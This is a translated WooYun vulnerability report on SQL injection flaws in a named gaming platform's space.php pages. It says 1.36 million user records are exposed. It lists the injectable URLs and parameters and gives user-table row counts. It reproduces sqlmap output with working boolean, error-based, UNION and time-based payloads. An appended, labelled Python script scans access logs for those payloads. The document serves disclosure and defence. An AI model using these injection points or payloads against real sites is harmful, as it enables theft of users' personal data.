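Vulnerability Summary

Bug ID: wooyun-2014-079716

Title: Multiple SQL injections on a gaming platform expose the information of 1.36 million users

Vendor: 小小岛民俱乐部

Author: JsStack

Submitted: 2014-10-17 12:09

Fixed: 2014-12-01 12:12

Publicly disclosed: 2014-12-01 12:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]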


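Vulnerability Details

Disclosure status:

2014-10-17: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-12-01: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple SQL injections on a gaming platform expose the information of 1.36 million users

Detailed description:

The confirmed injection points are (each URL is followed by the injectable parameter):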
www.xiaoxiaodaomin.com/space.php?do=gift&giftid=1&view=song giftid
www.xiaoxiaodaomin.com/space.php?do=anime&id=160&imgid=1&types=&view=cartoon_imagesview imgid
www.xiaoxiaodaomin.com/space.php?do=gift&order=nums&types=credit&userid=1&view=song userid
www.xiaoxiaodaomin.com/space.php?do=gift&types=beans&userid=1&view=song userid
www.xiaoxiaodaomin.com/space.php?do=pnotice&id=1 id
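and so on. There are many more, which are not all listed here.
Running SQL queries shows that the database holds information on 1.36 million users. If it leaks, the consequences are serious.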

select count(*) from uc_members:    '1365276'
select count(*) from uchome_member: '1364625'
select count(*) from ecs_users: '1363243'

Proof of vulnerability:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: giftid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: do=gift&giftid=1 AND 2302=2302&view=song
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: do=gift&giftid=1 AND (SELECT 1413 FROM(SELECT COUNT(*),CONCAT(0x7171736871,(SELECT (CASE WHEN (1413=1413) THEN 1 ELSE 0 END)),0x71636a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&view=song
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: do=gift&giftid=1 UNION ALL SELECT CONCAT(0x7171736871,0x774e67676a7258744b54,0x71636a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&view=song
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: do=gift&giftid=1 AND SLEEP(5)&view=song
---
[10:13:20] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.17
back-end DBMS: MySQL 5.0
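
As an added example (not part of the original report or the vendor's code): the parameters listed above are numeric IDs, and every payload in the sqlmap output breaks that format, so access logs can be triaged by checking those parameters for non-digit values. The log lines are constructed, the combined log format is an assumption, and the technique labels mirror the sqlmap output.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the report lists as injectable on space.php; all carry numeric IDs.
NUMERIC_PARAMS = {"giftid", "imgid", "userid", "id"}

# Coarse signatures for the four techniques named in the sqlmap output.
# Checked in order; the first match labels the finding.
TECHNIQUES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("error-based", re.compile(r"\binformation_schema\b|\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

# Request line inside an access-log entry (combined log format assumed).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')


def check_request(target):
    """Return (param, decoded_value, label) for each suspicious ID parameter."""
    parts = urlsplit(target)
    if not parts.path.endswith("/space.php"):
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are seen in clear.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS:
            continue
        # Allow-list: an ID is 1 to 8 ASCII digits and nothing else.
        if re.fullmatch(r"[0-9]{1,8}", value):
            continue
        label = next((t for t, rx in TECHNIQUES if rx.search(value)),
                     "non-numeric value")
        findings.append((name, value, label))
    return findings


def scan_log(lines):
    """Return (line_number, param, decoded_value, label) for every finding."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for finding in check_request(match.group("target")):
            hits.append((lineno,) + finding)
    return hits


# Constructed sample log: documentation-range IPs, payloads shortened.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Oct/2014:10:13:01 +0800] "GET /space.php?do=gift&giftid=1&view=song HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Oct/2014:10:13:02 +0800] "GET /space.php?do=gift&giftid=1%20AND%202302%3D2302&view=song HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Oct/2014:10:13:03 +0800] "GET /space.php?do=gift&giftid=1%20AND%20SLEEP%285%29&view=song HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Oct/2014:10:13:09 +0800] "GET /space.php?do=gift&giftid=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&view=song HTTP/1.1" 200 740',
    '198.51.100.9 - - [17/Oct/2014:10:13:10 +0800] "GET /space.php?do=gift&types=beans&userid=1%20AND%20%28SELECT%201%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29&view=song HTTP/1.1" 200 312',
    '203.0.113.7 - - [17/Oct/2014:10:13:11 +0800] "GET /space.php?do=pnotice&id=1 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [17/Oct/2014:10:13:12 +0800] "GET /space.php?do=anime&id=160&imgid=1%27&types=&view=cartoon_imagesview HTTP/1.1" 200 96',
    '203.0.113.7 - - [17/Oct/2014:10:13:13 +0800] "GET /index.php?id=abc HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for lineno, param, value, label in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {param}={value!r} -> {label}")
```

The same digits-only check, enforced server-side before the query is built and combined with parameterized queries, is what removes these injection points; the log scan only shows where they were probed.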



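Fix:

Copyright notice: when reposting, please credit the source JsStack@乌云


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused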

